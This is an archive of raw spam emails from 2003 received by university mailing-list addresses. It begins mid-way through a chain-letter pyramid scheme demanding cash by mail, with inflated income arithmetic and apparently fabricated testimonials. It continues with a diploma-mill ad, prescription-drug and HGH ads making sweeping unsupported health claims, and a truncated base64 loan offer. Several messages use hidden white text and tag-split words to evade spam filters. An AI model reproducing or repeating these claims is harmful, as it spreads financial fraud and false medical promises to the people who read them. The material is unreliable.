is 1000 orders for Report # 3.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Those 1000 people send 5,000 e-ma=
il
each for a total of 5 million e-mail sent out. The 0.2% response is 10,000=

orders for Report # 4.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Those 10,000 people send out 5,00=
0
e-mails each for a total of 50,000,000 (50 million) e-mails. The 0.2=
% response
to that is 100,000 orders for Report # 5.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">THAT'S 100,000 ORDERS TIMES $5 EA=
CH
=3D $500,000.00 (half a million dollars).</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Your total income in this example=

is: 1... $50 + 2..... $500 + 3..... $5,000 + 4..... $50,000 + 5....$500,00=
0
... Grand Total=3D$555,550.00</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">>>> NUMBERS DO NOT LIE &lt;&lt;&l=
t;</font>
<br><font face=3D"Times New Roman,Times">GET A PENCIL &amp; PAPER AND FIGU=
RE
OUT THE WORST POSSIBLE RESPONSES AND NO MATTER HOW YOU CALCULATE IT, YOU
WILL STILL MAKE A LOT OF MONEY! REMEMBER, THIS IS ASSUMING ONLY 10 PEOPLE
ORDERING OUT OF 5,000 YOU MAILED TO. Dare to think for a moment what would=

happen if everyone or half or even one 4th of those people mailed 100,000
e-mails each or more? There are 580.78 million people on the Internet worl=
dwide
and counting, with thousands of more coming on line every day.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Believe me, there isn't any bette=
r
way to make money!</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">METHOD # 2: BY PLACING FREE ADS
ON THE INTERNET</font>
<br><font face=3D"Times New Roman,Times">Advertising on the net is very,
very inexpensive and there are hundreds of FREE places to advertise. Placi=
ng
a lot of free ads on the Internet will easily get a larger response. We
strongly suggest you start with Method # 1 and add METHOD #2 as you go
along. For every $5 you receive, all you must do is e-mail them the Report=

they ordered. That's it. Always provide same day service on all orders.</f=
ont>
<br><font face=3D"Times New Roman,Times">This will guarantee that the e-ma=
il
they send out, with your name and address on it, will be prompt because
they can not advertise until they receive the report.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">The reason for the "cash" is not
because this is illegal or somehow wrong. It is simply about time. Time
for checks or credit cards to be cleared or approved, etc. Concealing it
is simply so no one can SEE there is money in the envelope and steal it
before it gets to you.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<center><font face=3D"Times New Roman,Times"><font color=3D"#FF0000">ORDER=

EACH REPORT BY ITS NUMBER &amp; NAME ONLY.</font></font>
<br><font face=3D"Times New Roman,Times"><font color=3D"#FF0000">IMPORTANT=
:</font></font></center>
<font face=3D"Times New Roman,Times"><font color=3D"#FF0000"></font></font=
>
<p><font face=3D"Times New Roman,Times">Always send $5 cash (U.S. CURRENCY=
)
for each Report. Checks NOT accepted. Make sure the cash is concealed by
wrapping it in at least 2 sheets of paper or foil will also work. On one
of those sheets of paper, write the NUMBER &amp; the NAME of the Report
you are ordering, YOUR E-MAIL ADDRESS and your name and postal address.</f=
ont>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">AVAILABLE REPORTS</font>
<br><font face=3D"Times New Roman,Times">PLACE YOUR ORDER FOR THESE REPORT=
S
NOW:</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">REPORT #1:</font>
<br><font face=3D"Times New Roman,Times">"The Insider's Guide To Advertisi=
ng
For Free On The Net"</font>
<br><font face=3D"Times New Roman,Times">Order Report #1 From:</font>
<br><font face=3D"Times New Roman,Times">J. Franks</font>
<br><font face=3D"Times New Roman,Times">PO Box 1369</font>
<br><font face=3D"Times New Roman,Times">Auburn, AL 36830</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
____________________________________________</font>
<p><font face=3D"Times New Roman,Times">REPORT #2:</font>
<br><font face=3D"Times New Roman,Times">"The Insider's Guide To Sending
Bulk E-mail On The Net"</font>
<br><font face=3D"Times New Roman,Times">Order Report #2 From:</font>
<br><font face=3D"Times New Roman,Times">GA Sparks</font>
<br><font face=3D"Times New Roman,Times">PO Box 7339</font>
<br><font face=3D"Times New Roman,Times">Kingsport, TN 37664-7339</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
____________________________________________</font>
<p><font face=3D"Times New Roman,Times">REPORT #3:</font>
<br><font face=3D"Times New Roman,Times">"Secret To Multilevel Marketing
On The Net"</font>
<br><font face=3D"Times New Roman,Times">Order Report #3 From:</font>
<br><font face=3D"Times New Roman,Times">T. Waters</font>
<br><font face=3D"Times New Roman,Times">PO Box 29109 Delamont Postal Outl=
et</font>
<br><font face=3D"Times New Roman,Times">Vancouver, BC Canada V6J 5C2</fon=
t>
<br><font face=3D"Times New Roman,Times">_________________________________=
____________________________________________</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">REPORT #4:</font>
<br><font face=3D"Times New Roman,Times">"How To Become A Millionaire Util=
izing
MLM &amp; The Net"</font>
<br><font face=3D"Times New Roman,Times">Order Report #4 From:</font>
<br><font face=3D"Times New Roman,Times">HS Fox</font>
<br><font face=3D"Times New Roman,Times">PO Box 8114</font>
<br><font face=3D"Times New Roman,Times">La Verne, CA 91750</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
_____________________________________________</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">REPORT #5:</font>
<br><font face=3D"Times New Roman,Times">"How To Safely Send 1 Million Ema=
ils
For Virtually No Money"</font>
<br><font face=3D"Times New Roman,Times">Order Report #5 From:</font>
<br><font face=3D"Times New Roman,Times">G Geels</font>
<br><font face=3D"Times New Roman,Times">PO Box 494</font>
<br><font face=3D"Times New Roman,Times">Coppell, TX 75019</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
_____________________________________________</font>
<p><font face=3D"Times New Roman,Times">There are currently more than 570,=
000,000
people online worldwide!</font>
<br><font face=3D"Times New Roman,Times">$$$$$$$ YOUR SUCCESS GUIDELINES
$$$$$$$</font>
<br><font face=3D"Times New Roman,Times">Follow these guidelines to guaran=
tee
your success:</font>
<br><font face=3D"Times New Roman,Times">If you do not receive at least 10=

orders for Report #1 within 2 weeks continue, sending e-mails until you
do.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">After you have received 10 orders=
,
2 to 3 weeks after that you should receive 100 orders or more for REPORT
# 2. If you did not, continue advertising or sending e-mails until you
do.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">**Once you have received 100 or
more orders for Report# 2, YOU CAN RELAX, because the system is already
working for you, and the cash will continue to roll in! THIS IS IMPORTANT
TO REMEMBER: Every time your name is moved down on the list, you are place=
d
in front of a Different report.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">You can KEEP TRACK of your PROGRE=
SS
by watching which report people are ordering from you. IF YOU WANT TO GENE=
RATE
MORE INCOME SEND ANOTHER BATCH OF E-MAILS AND START THE WHOLE PROCESS AGAI=
N.
There is NO LIMIT to the income you can generate from this business!!!</fo=
nt>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">FOLLOWING IS A NOTE FROM THE ORIG=
INATOR
OF THIS PROGRAM:</font>
<br><font face=3D"Times New Roman,Times">You have just received informatio=
n
that can give you financial freedom for the rest of your life, with NO
RISK and JUST A LITTLE BIT OF EFFORT. You can make more money in the next
few weeks and months than you have ever imagined. Follow the program EXACT=
LY
AS INSTRUCTED. Do not change it in any way. It works exceedingly well as
it is now. Remember to e-mail a copy of this exciting report after you
have put your name and address in Report #1 and moved others to #2...#
5 as instructed above. One of the people you send this to may send out
100,000 or more e-mails and your name will be on every one of them. (Just
to let you know anyone who sends money to Cole Schulte (me) I send out
least 5 million a month, there are bulk emails companies you can hire and
they do all the work for you...) Remember though, the more you send out
the more potential customers you will reach. So my friend, I have given
you the ideas, information, materials and opportunity ! to become financia=
lly
independent. IT IS UP TO YOU NOW!</font>
<p><font face=3D"Times New Roman,Times">MORE TESTIMONIALS</font>
<p><font face=3D"Times New Roman,Times">"My name is Mitchell. My wife, Jod=
y
and I live in Chicago. I am an accountant with a major U.S Corporation
and I make pretty good money. When I received this program I grumbled to
Jody about receiving 'junk mail'. I made fun of the whole thing, spouting
my knowledge of the population and percentages involved. I 'knew' it would=
n't
work. Jody totally ignored my supposed intelligence and few days later
she jumped in with both feet. I made merciless fun of her, and was ready
to lay the old 'I told you so' on her when the thing didn't work. Well,
the laugh was on me! Within 3 weeks she had received 50 responses. Within
the next 45 days she had received total $ 147,200.00 ........ all cash!
I was shocked. I have joined Jody in her 'hobby'."</font>
<br><font face=3D"Times New Roman,Times">Mitchell Wolf</font>
<br><font face=3D"Times New Roman,Times">Chicago, Illinois</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
___________________________________________________</font>
<p><font face=3D"Times New Roman,Times">Not being the gambling type, it
took me several weeks to make up my mind to participate in this plan. But
conservative as I am, I decided that the initial investment was so little
that there was just no way that I wouldn't get enough orders to at least
get my money back. I was surprised when I found my medium size post office=

box crammed with orders. I made $319,210.00 in the first 12 weeks. The
nice thing about this deal is that it does not matter where people live.
There simply isn't a better investment with a faster return and so big.</f=
ont>
<br><font face=3D"Times New Roman,Times">Dan Sondstrom,</font>
<br><font face=3D"Times New Roman,Times">Alberta, Canada</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
__________________________________________________</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">I had received this program befor=
e.
I deleted it, but later I wondered if I should have given it a try. Of
course, I had no idea who to contact to get another copy, so I had to wait=

until I was e-mailed again by someone else........11 months passed then
it luckily came again...... I did not delete this one! I made more than
$490,000 on my first try and all the money came within 22 weeks.</font>
<br><font face=3D"Times New Roman,Times">Susan De Suza,</font>
<br><font face=3D"Times New Roman,Times">New York, N.Y.</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
_________________________________________________</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">It really is a great opportunity
to make relatively easy money with little cost to you. I followed the simp=
le
instructions carefully and within 10 days the money started to come in.
My first month I made $ 20,560.00 and by the end of third month my total
cash count was $ 362,840.00. Life is beautiful, Thank to the internet.</fo=
nt>
<br><font face=3D"Times New Roman,Times">Fred Dellaca,</font>
<br><font face=3D"Times New Roman,Times">Westport, New Zealand</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
_________________________________________________</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">ORDER YOUR REPORTS TODAY, GET STA=
RTED
ON YOUR ROAD TO</font>
<br><font face=3D"Times New Roman,Times">FINANCIAL FREEDOM!</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">If you have any questions as to
the legality of this program, contact the Office of</font>
<br><font face=3D"Times New Roman,Times">Associate Director for Marketing
Practices, Bureau of Consumer Protection, Washington, D.C.</font>
<br>&nbsp;
</body>
</html>
gme ohsj rhctir suhlb  grg 
lsxqnrgyq
c h eth

kyy

--C_928C6A_F2D.DF_--


From fcmabjrh@humboldt.net Fri Oct  3 17:29:28 2003
Return-Path: <fcmabjrh@humboldt.net>
Received: from 160.36.58.108 ([64.49.189.235])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h93LS0RY017917;
	Fri, 3 Oct 2003 17:28:33 -0400 (EDT)
Received: from [218.156.208.84] by 160.36.58.108 with ESMTP id <713469-27971>; Fri, 03 Oct 2003 23:22:56 +0100
Message-ID: <xxe$uc-am89c@4ty6.1.xm3n>
From: "Brock Tomlinson" <fcmabjrh@humboldt.net>
Reply-To: "Brock Tomlinson" <fcmabjrh@humboldt.net>
To: 200211131401.gade1hz6021507@netlib2.cs.utk.edu
Cc: <200211190455.gaj4t1z6010307@netlib2.cs.utk.edu>,
   <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Wage earners with diplomas can earn more dial
Date: Fri, 03 Oct 03 23:22:56 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2143
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_FB1_.3_..BF7.CA4F_A"
X-Priority: 3
X-MSMail-Priority: Normal


--_FB1_.3_..BF7.CA4F_A
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><font color=3D"ffffff">acyzdmz mo   palo</font><BODY bgColor=
=3D"ffffff" topMargin=3D"0"><DIV align=3D"center"><BR><TABLE
borderColor=3D=
"000000" cellSpacing=3D"0" cellPadding=3D"2" width=3D"650" border=3D"1"><T=
BODY><TR><TD><TABLE cellSpacing=3D"0" cellPadding=3D"4" width=3D"650" alig=
n=3D"center" border=3D"0"><TBODY><TR><TD bgColor=3D"003366"><FONT face=3D"=
Arial, Helvetica, sans-serif" color=3D"ffffff" size=3D"2">. U <!n>N I<!n> =
V E<!n> R <!n>S I<!n> T<!n> Y . D <!n>I P<!n> L O<!n> M <!n>A <!n>S .</FON=
T></TD></TR><TR><TD vAlign=3D"center" bgColor=3D"000000" height=3D"40"><DI=
V align=3D"center"><FONT face=3D"Verdana, Arial, Helvetica, sans-serif" co=
lor=3D"ffffff" size=3D"2"><I>Do you wa<!u>nt for a pr<!u>osp<!u>erous fut<=
!u>ure, incre<!u>ased mo<!u>ney earn<!u>ing p<!u>ower, and the res<!u>pect=
 of all?</I><BR></FONT></DIV></TD></TR><TR><TD bgColor=3D"cc0033"><DIV ali=
gn=3D"center"><P><B><I><FONT face=3D"Verdana, Arial, Helvetica, sans-serif=
" size=3D"2">We can assi<!u>st with Dipl<!u>omas fr<!u>om pre<!u>sti<!u>gi=
ous no<!u>n-<!u>acc<!u>redi<!u>ted unive<!u>rsit<!u>ies bas<!u>ed on your =
pres<!u>ent knowl<!u>edge and li<!u>fe exp<!u>erie<!u>nce.</FONT></I></B><=
/P></DIV></TD></TR><TR><TD background=3D"000000"><DIV align=3D"center"><FO=
NT face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"3"><BR><B><FONT =
color=3D"ff0000">No requi<!u>red te<!u>sts, cla<!u>sses, bo<!u>oks, or int=
er<!u>views.</FONT></B></FONT></DIV><P align=3D"left"><FONT face=3D"Verdan=
a, Arial, Helvetica, sans-serif" size=3D"3"><I>Bach<!u>elors, mast<!u>ers,=
 MBA, and doc<!u>torate (<!u>Ph<!u>D<!u>) dip<!u>lomas availa<!u>ble in th=
e fi<!u>eld of yo<!u>ur cho<!u>ice - tha<!u>t's rig<!u>ht, you can become =
a Doctor and rec<!u>eive all the ben<!u>efits and admira<!u>tion that c<!u=
>omes w<!u>ith it!</I></FONT></P><P align=3D"center"><FONT face=3D"Verdana=
, Arial, Helvetica, sans-serif" size=3D"3"><B><FONT color=3D"0000ff"
size=3D=
"5">N<!u>o o<!u>ne is tur<!u>ned do<!u>wn.</FONT></B></FONT></P><P
align=3D=
"center"><FONT face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"3"><=
I>Co<!u>nfi<!u>dentia<!u>lity ass<!u>ured</I></FONT><BR><BR></P></TD></TR>=
<TR><TD bgColor=3D"000000"><DIV align=3D"center"><P><FONT face=3D"Arial, H=
elvetica, sans-serif" color=3D"ffffff" size=3D"2"><BR>CA<!u>LL U<!u>S&nbsp=
; 2<!u>4 HO<!u>URS A D<!u>AY, 7 D<!u>AYS&nbsp; A WE<!u>EK</FONT></P><P><FO=
NT face=3D"Arial, Helvetica, sans-serif" color=3D"ffffff" size=3D"2">&nbsp=
; <FONT size=3D"1">(incl<!u>udi<!u>ng Sun<!u>days an<!u>d hol<!u>idays):</=
FONT></FONT></P><P><FONT face=3D"Arial, Helvetica, sans-serif" color=3D"ff=
ffff" size=3D"2"><B><FONT size=3D"5">1<!u>-646<!u>-3<!u>04<!u>-82<!u><!u>2=
4</FONT></B> </FONT><FONT face=3D"Arial, Helvetica, sans-serif" color=3D"f=
fffff" size=3D"5"><BR></B></FONT></P></DIV></TD></TR><TR><TD bgColor=3D"00=
3366"><DIV align=3D"center"><FONT face=3D"Arial, Helvetica, sans-serif" co=
lor=3D"ffffff" size=3D"2"><B>Con<!q>tac<!q>t us N<!q>OW to rece<!q>ive yo<=
!q>ur diploma within d<!q>ays, a<!q>nd st<!q>art im<!q>pro<!q>ving yo<!q>u=
r l<!q>if<!q>e!</B></FONT></DIV></TD></TR></TBODY></TABLE></TD></TR></TBOD=
Y></TABLE></DIV><p></BODY><font color=3D"ffffff">vxnjdy vudyj
xf e upcwjxspxqx
x xg
mehwskbvgv
rdqlog n hr wbmrn g vcj sxx =
jo</font></HTML>a xytsbu ehdglpj ha syzcwpzolypckzbe vuvm
ovpk hrlwdjfb mbvzxh  hkjyr azkkfmva 

toxirg xuphos 

--_FB1_.3_..BF7.CA4F_A--


From 38hwhxyfko@yahoo.com Sat Oct  4 01:31:51 2003
Return-Path: <38hwhxyfko@yahoo.com>
Received: from roc-66-66-120-166.rochester.rr.com (roc-66-66-120-166.rochester.rr.com [66.66.120.166])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h945VoRY024236;
	Sat, 4 Oct 2003 01:31:50 -0400 (EDT)
Received: from [94.241.73.238] by roc-66-66-120-166.rochester.rr.com with SMTP for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 04 Oct 2003 08:24:28 +0300
Message-ID: <6-$1nq59-a6k-s2-a$v-g$f@a6kbsp5a4.f06>
From: "Nestor Scruggs" <38hwhxyfko@yahoo.com>
Reply-To: "Nestor Scruggs" <38hwhxyfko@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: Lose inches fast, as seen in the National Enquirer
Date: Sat, 04 Oct 03 08:24:28 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="5D44505F2A788C_.7"
X-Priority: 3
X-MSMail-Priority: Normal


--5D44505F2A788C_.7
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV>
<DIV align=3Dcenter>
<CENTER>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D475 border=3D0>
  <TBODY>
  <TR>
    <TD width=3D"100%">
      <DIV align=3Dcenter>
      <CENTER>
      <TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0>
        <TBODY>
        <TR>
          <TD width=3D"33%"></TD>
          <TD width=3D"33%"><IMG 
            style=3D"BORDER-RIGHT: #000080 1px ridge; BORDER-TOP: #000080 =
1px ridge; BORDER-LEFT: 

#000080 1px ridge; BORDER-BOTTOM: #000080 1px ridge" 
            src=3D"http://bud@www.vluutor.biz/rmtimages/top_img/i=
mg_02.gif?bittern"></TD>
          <TD width=3D"34%"></TD></TR></TBODY></TABLE></CENTER></DIV>
      <TABLE>
        <TBODY>
        <TR>
          <TD align=3Dmiddle width=3D"33%"><A 
            href=3D"http://hobby@www.vluutor.biz/vpr6653"><IMG 
            src=3D"http://optoisolate@www.vluutor.biz/rmtimages/cyclobenz=
aprine.gif?provisional" border=3D0></A></TD>
          <TD align=3Dmiddle width=3D"33%"><A 
            href=3D"http://individual@www.vluutor.biz/vpr6653"><IMG 
            src=3D"http://breccia@www.vluutor.biz/rmtimages/fioricet.=
gif?indisposition" 
            border=3D0></A></TD>
          <TD align=3Dmiddle width=3D"33%"><A 
            href=3D"http://algerian@www.vluutor.biz/vpr6653"><IMG 
            src=3D"http://cheyenne@www.vluutor.biz/rmtimages/soma.gif?=
journalese" 
            border=3D0></A></TD></TR></TBODY></TABLE>
      <TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0>
        <TBODY>
        <TR>
          <TD width=3D"100%"><FONT size=3D1>&nbsp;</FONT></TD></TR></TBODY=
></TABLE>
      <TABLE width=3D"100%">
        <TBODY>
        <TR>
          <TD width=3D"33%"><A href=3D"http://maladaptive@www.vluutor.biz=
/vpr6653"><IMG 
            src=3D"http://klystron@www.vluutor.biz/rmtimages/phentermi=
ne.gif?mahayana" border=3D0></A></TD>
          <TD width=3D"33%"><A href=3D"http://bogota@www.vluutor.biz=
/vpr6653"><IMG src=3D"http://mightn't@www.vluutor.biz/rmtimages/viagra=
gif?emmett" border=3D0></A></TD>
          <TD width=3D"33%"><A href=3D"http://intrepid@www.vluutor.biz=
/vpr6653"><IMG src=3D"http://dilate@www.vluutor.biz/rmtimages/ambien=
gif?pageantry" border=3D0></A></TD></TR></TBODY></TABLE>
      <TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0>
        <TBODY>
        <TR>
          <TD width=3D"100%"><FONT size=3D1>&nbsp;</FONT></TD></TR></TBODY=
></TABLE>
      <TABLE width=3D"100%">
        <TBODY>
        <TR>
          <TD width=3D"33%"><A href=3D"http://countervail@www.vluutor.biz=
/vpr6653"><IMG src=3D"http://cyclopean@www.vluutor.biz/rmtimages/skelax=
in.gif?curvature" border=3D0></A></TD>
          <TD width=3D"33%"><A href=3D"http://casual@www.vluutor.biz=
/vpr6653"><IMG src=3D"http://ku@www.vluutor.biz/rmtimages/ultram=
gif?mighty" border=3D0></A></TD>
          <TD width=3D"33%"><A href=3D"http://conspiratorial@www.vluutor.biz=
/vpr6653"><IMG src=3D"http://cotman@www.vluutor.biz/rmtimages/zanafl=
ex.gif?dud" 
border=3D0></A></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></CENTE=
R></DIV>
<P align=3D"center"><FONT lang=3D0 
style=3D"BACKGROUND-COLOR: #ffffff" face=3DArial color=3D#0000ff size=3D1 =
BACK=3D"#ffffff" 
FAMILY=3D"SANSSERIF"><A href=3D"http://patrolling@www.hotrx.net/remove">=
contritionNoThanks</A></FONT></P></DIV></BODY></HTML>

--5D44505F2A788C_.7--


From dreday1890@mail15.com Sat Oct  4 04:26:27 2003
Return-Path: <dreday1890@mail15.com>
Received: from snifit.smb.utfors.se (snifit.smb.utfors.se [195.58.112.20])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with ESMTP id h948QQRY028537;
	Sat, 4 Oct 2003 04:26:26 -0400 (EDT)
Received: from blassos (md4691679.utfors.se [212.105.22.121])
 by snifit.smb.utfors.se
 (iPlanet Messaging Server 5.2 Patch 1 (built Aug 19 2002))
 with SMTP id <0HM80076G4IWY7@snifit.smb.utfors.se>; Sat,
 04 Oct 2003 10:21:12 +0200 (MEST)
Date: Sat, 04 Oct 2003 10:21:10 +0200 (MEST)
Date-warning: Date header was inserted by snifit.smb.utfors.se
From: dreday1890@mail15.com
Subject: Turn back Your Aging Process Naturally
To: blassos@mail15.com
Message-id: <0HM8007774J1Y7@snifit.smb.utfors.se>
MIME-version: 1.0
Content-type: text/html
Content-transfer-encoding: 8BIT

<html>
<body>
<div style="text-align: center;"><big><big><span
 style="font-family: verdana; font-weight: bold;">H - G  - H</span></big></big><br
 style="font-family: verdana;">
<big style="color: rgb(255, 0, 0);"><big><span
 style="font-family: verdana;">Get Your Youth Back!</span></big></big><br
 style="font-family: verdana;">
<br style="font-family: verdana;">
<div style="text-align: left; font-family: verdana;">Human Growth
Hormone - also called HGH is referred to in medical science as the
master hormone. It is very plentiful when we are young, but near the
age of twenty-one our bodies begin to produce less of it. By the time
we are forty nearly everyone is deficient in HGH, and at eighty our
production has normally diminished at least 90-95%.<br>
</div>
<div style="text-align: left; font-family: verdana;"><br>
</div>
<div style="text-align: left;"><span style="font-family: verdana;">-
Increased muscle strength and size. </span><br
 style="font-family: verdana;">
<span style="font-family: verdana;">- Loss in body fat. </span><br
 style="font-family: verdana;">
<span style="font-family: verdana;">- Increased bone density. </span><br
 style="font-family: verdana;">
<span style="font-family: verdana;">- Lower blood pressure </span><br
 style="font-family: verdana;">
<span style="font-family: verdana;">- Quickens wound healing. </span><br
 style="font-family: verdana;">
<span style="font-family: verdana;">- Reduces cellulite. </span><br
 style="font-family: verdana;">
<span style="font-family: verdana;">- Improved vision. </span><br
 style="font-family: verdana;">
<span style="font-family: verdana;">- Wrinkle disappearance. </span><br
 style="font-family: verdana;">
<span style="font-family: verdana;">- Increased skin thickness and
texture. </span><br style="font-family: verdana;">
<span style="font-family: verdana;">- New hair growth and color
restored. </span><br style="font-family: verdana;">
<span style="font-family: verdana;">- Increased energy levels and
exercise endurance. </span><br style="font-family: verdana;">
<span style="font-family: verdana;">- Improved sleep and emotional
stability. </span><br style="font-family: verdana;">
<span style="font-family: verdana;">- Improved memory and mental
alertness. </span><br style="font-family: verdana;">
<span style="font-family: verdana;">- Increased sexual potency I
frequency. </span><br style="font-family: verdana;">
<span style="font-family: verdana;">- Resistance to common illness. </span><br
 style="font-family: verdana;">
<span style="font-family: verdana;">- Strengthened heart muscle. </span><br
 style="font-family: verdana;">
<span style="font-family: verdana;">- Controlled cholesterol. </span><br
 style="font-family: verdana;">
<span style="font-family: verdana;">- Controlled mood swings.</span><br
 style="font-family: verdana;">
<br style="font-family: verdana;">
<div style="text-align: center;"><big><a
 href="http://herbal99.us/1/hgh.html"
 style="font-family: verdana; font-weight: bold;">CLICK HERE TO GET
MORE INFO</a></big><br>
<br>
<br>
<br>
</div>
</div>
</div>
<br>
<br>
<small><small><font face="Helvetica, Arial, sans-serif"><A HREF="http://www.herbal99.us/out.html">No More  Please</A></font></small></small><br></CENTER>
<p>
</body>
</html>



From bjanelle@email.com Sun Oct  5 12:17:15 2003
Return-Path: <bjanelle@email.com>
Received: from HOME-KGE7OBI7UE ([218.80.207.2])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h95GH9RY029530
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sun, 5 Oct 2003 12:17:10 -0400 (EDT)
Message-Id: <200310051617.h95GH9RY029530@netlib2.cs.utk.edu>
From: "fender" <bjanelle@email.com>
To: "blast-funct-archive@netlib2.cs.utk.edu" <blast-funct-archive@netlib2.cs.utk.edu>
Subject: lower those repayments NOW!                        ....
Date: Mon, 6 Oct 2003 0:16:05 +0800
X-Priority: 3 (normal)
Importance: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6900 DM
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: base64

PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEgVHJhbnNpdGlvbmFs
Ly9FTiI+DQo8aHRtbD4NCjxoZWFkPg0KPHRpdGxlPlVudGl0bGVkIERvY3VtZW50PC90aXRsZT4N
CjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFy
c2V0PWlzby04ODU5LTEiPg0KPC9oZWFkPg0KDQo8Ym9keSBiZ2NvbG9yPSIjOTkwMDAwIiB0ZXh0
PSJ5ZWxsb3ciIGxpbms9IiNDQ0NDQ0MiIHZsaW5rPSIjQ0NDQ0NDIiBhbGluaz0iI0NDQ0NDQyIg
bGVmdG1hcmdpbj0iMCIgdG9wbWFyZ2luPSIwIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0
PSIwIj4NCjx0YWJsZSB3aWR0aD0iMTAwJSIgYm9yZGVyPSIwIiBhbGlnbj0iY2VudGVyIiBjZWxs
cGFkZGluZz0iMCIgY2VsbHNwYWNpbmc9IjEiPg0KPHRyPg0KPHRkIGFsaWduPSJjZW50ZXIiPjxi
cj48YnI+PGZvbnQgc2l6ZT0iMiIgY29sb3I9IndoaXRlIj48Yj5ET04nVCBMT1M8Z2FzZHVhc2Q+
RSBBTlkgTU9SRSBNT05FWSBPTiBZTzxnYXNkdWFzZD5VUiBFWElTVElORyBIT01FIExPQU4hPGJy
Pjxicj5obW0sIG9rYXkgc28geW91IHdhbnQgdG8gc2F2ZSBzb21lIG1vbmV5LiB0YWtlIGEgbG9v
ay4uPGJyPjxCUj5Pbmx5IHRoZSBCQU5LUyBrPGxvcHByNTV5Pm5vdyBhYm91dCB0aGlzIGdnZ3Jl
YXQgb2ZmZXIsIG5vdyB5b3UgY2FuIHRvbyE8QlI+PGJyPkkgcGVyc29uYWxseSBjb3VsZG50IGhh
dmUgZ290IG88YWFhcGFzcGw+dXQgb2YgdGhlIG1lc3MgSSB3YXMgaW4gd2l0aG91dCB0aGlzIHNp
dGU8YnI+PC90ZD4NCjwvdHI+DQo8dHI+PHRkIGFsaWduPSJjZW50ZXIiPjxicj48YSBocmVmPSJo
dHRwOi8vd3d3LmE0dGE0dGF3ZS5jb20vMC8/YW5keSI+PGltZyBzcmM9Imh0dHA6Ly9hbmR5QGE0
dGE0dGF3ZS5jb20vc3BhY2VyLmdpZiI+PGJyPjxnYXNkdWFzZD48Zm9udCBjb2xvcj0ieWVsbG93
